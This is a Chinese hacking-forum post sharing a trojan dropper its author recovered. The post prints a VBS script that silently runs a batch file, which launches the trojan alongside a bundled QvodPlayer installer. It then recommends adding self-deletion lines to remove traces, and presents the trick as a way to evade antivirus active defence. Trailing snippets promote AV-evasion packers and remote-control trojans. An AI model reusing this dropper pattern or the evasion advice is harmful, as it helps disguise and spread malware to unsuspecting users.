第三代杀软的主动和行为厉害的没法说,其实不少大牛其实都找到了方法。只是没放出来,小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合,在登录97ai。com的时候发现他上面有个网址发部器,一看当然知道是木马啦 ,就下了下来是个exe的自解压,拿到虚拟机上解压了一下,发现释放了四个文件,一个是快播的播放器,一个是木马,一个是名为setup.bat的文件,一个是名为setup.vbs的文件,看了一下啊。发现他首先把四个文件都解压到windows目录下,首先运行setup.vbs,通过这个文件调用setup.bat,再通过bat运行播放器和木马。反正留着也没用就发出来共享一下 。
以下是两个主要文件的内容:
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
setup.vbs内容如下
On Error Resume Next
Dim oShell
Set oShell= WScript.CreateObject("WScript.Shell")
a = oShell.Run ("c:\windows\setup.BAT",0)
(这个vbs就是运行bat用的。但我也不明白什么意思?在新手讨论区发了个帖子。很快得到了回答,在这里要感谢一下咱们暗组中的shedream)
说明如下:
On Error Resume Next '如果有错误则进行下一句
Dim oShell '声明变量
Set oShell= WScript.CreateObject("WScript.Shell") '创建一个WScript.shell对象
a = oShell.Run ("",0) '打开一个可执行文件,""号内为程序路径
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
这里 在 加入
del setup.bat
del setup.vbs
比较好点
分享到:
相关推荐
安全研究员通过分析杀毒软件的工作机制、检测算法和响应措施,可以开发出一系列的策略和工具,用于模拟正常软件的行为,或者混淆恶意代码,从而实现绕过主动防御的目的。但需要明确的是,这些方法应当在合法的框架内...
标题中的“2010最新全免杀双过主动”指的是该压缩包内可能包含的是一种针对2010年安全环境的免杀技术,它声称可以避开两种或以上的主动防御系统,特别是“过瑞星主动防御”,意味着它可以绕过瑞星这款知名杀毒软件的...
在标签"免杀瑞星2010主动防御 免杀过瑞星2010主动防御"中,再次强调了这款软件的重点在于其逃避瑞星2010主动防御的能力。这暗示了软件开发者可能针对特定的安全软件进行了优化,使得其在特定环境中能够隐蔽运行。 ...
在上述信息中,我们关注的标题为“免杀360过主动防御加入白名单代码放出”,这暗示着有技术爱好者或安全研究人员分享了一种特殊代码,该代码能够帮助特定程序绕过360安全卫士的主动防御机制,并成功加入到其白名单中...
描述中的“过瑞星主动防御和其他主流软件”意味着这个免杀壳技术已经成功地避开了瑞星主动防御系统以及市场上其他常见的安全软件。瑞星是中国知名的反病毒软件,其主动防御功能能够监控并阻止潜在的恶意活动。提到它...
免杀介绍 汇编基础教程(浓缩) 8088汇编手册 经典花指令参考 定位修改与免杀 sys文件简单免杀 asp马免杀 杀毒趋势 主动防御介绍 本文档转自----- ...包括行为,专杀,高级启发的免杀 作者: king QQ:520004949
"免杀时可以添加数字签名过卡吧主动"这个标题揭示了一个关键的免杀策略,即通过为恶意代码添加数字签名来绕过卡巴斯基(Kaspersky)等安全软件的主动防御机制。这种做法利用了数字签名在验证软件来源和完整性方面的...
标题和描述中提到的"免杀过主动瑞星金山江民卡巴NOD防御最新版",这通常指的是一个黑客或安全研究者针对特定反病毒软件(如瑞星、金山、江民、卡巴斯基NOD)的主动防御机制创建的规避技术。主动防御是现代杀毒软件的...
《Gh0st源码实战免杀瑞星主动加360提示》 在网络安全领域,恶意软件的检测与防御是一场永无止境的博弈。Gh0st,一个著名的远程控制木马,因其强大的功能和隐蔽性,常常被黑客用于非法活动。本文将深入探讨如何基于...
描述中提到的“可以过掉瑞星主动”,意味着这个免杀壳对于瑞星的主动防御功能有很好的规避效果。主动防御是反病毒软件的一项功能,它能够实时监控系统行为,检测并阻止潜在的恶意活动。如果一个免杀壳能成功绕过这一...
以大白鲨VIP免杀远控为例,其主执行文件“大白鲨远控2010免杀版本.exe”应该包含了进行远程控制所需的核心控制和通信模块。配置文件如“DBS_DATA.ini”则存储了软件的设置和参数,而“IPDATA.DAT”可能记录了与网络...
在对抗免杀远程控制的技术上,安全研究人员不断更新和改进反恶意软件工具,采用机器学习和行为分析等方法来检测和阻止这类威胁。同时,用户也需要提高网络安全意识,定期更新系统和软件,避免打开来源不明的文件,...
值得注意的是,这里提到了“主动”,可能意味着这款免杀壳不仅能对抗静态扫描,还能应对基于行为分析的主动防御系统。同时,描述中的强烈推荐和免费分享,表明这款工具在某些社区内可能存在一定的受欢迎程度,但用户...
尽管免杀技术可以帮助攻击者绕过防御,但随着反病毒技术的进步,如机器学习和行为分析,免杀技术也在不断发展和升级。因此,无论是攻击者还是防御者,都需要不断学习和掌握最新的网络安全知识,以应对日益复杂的安全...
7. **社会工程学**:利用用户的行为习惯或心理弱点,诱使用户主动执行恶意代码,而非依赖技术手段进行免杀。 然而,尽管免杀技术可以暂时帮助恶意软件逃避检测,但随着反病毒软件技术的不断发展,尤其是启发式扫描...
3. **特征码绕过**:免杀的一个重要方法是避开安全软件的特征码匹配机制。教程可能会介绍如何修改或删除恶意代码中的特定特征码,或者使用动态生成代码来防止被特征库捕获。 4. **行为分析**:免杀技术也包括对恶意...
【标题】"过360免杀上兴远程控制"涉及到的是网络安全领域中的技术,主要目标是让恶意软件能够避开360安全卫士(包括其主动防御和杀毒功能)的检测,以便实现上兴远程控制软件的隐秘运行。 【描述】"过360提示 主动...
Ollydbg,一个在逆向工程领域备受推崇的反汇编工具,是软件开发者、安全研究人员以及黑客们进行恶意代码分析和免杀技术研究的重要利器。本文将详细探讨Ollydbg的核心功能、工作原理以及它在免杀技术中的应用。 一、...
本文将详细介绍一种利用系统服务名称进行伪装的方法,以实现绕过360安全卫士主动防御的目的。 #### 二、原理分析 360安全卫士等软件通常通过对系统启动项和服务进行监控来防止恶意程序启动。然而,如果恶意软件...
特征码主要又分为:文件特征码,内存特征码,行为特征码,(主动特征码,如瑞星) B. 同时,又分为:单一特征码和复合特征码; 单一特征码就是说,一个程序中的几句代码被杀毒软件做为识别标志。修改掉一处就可以...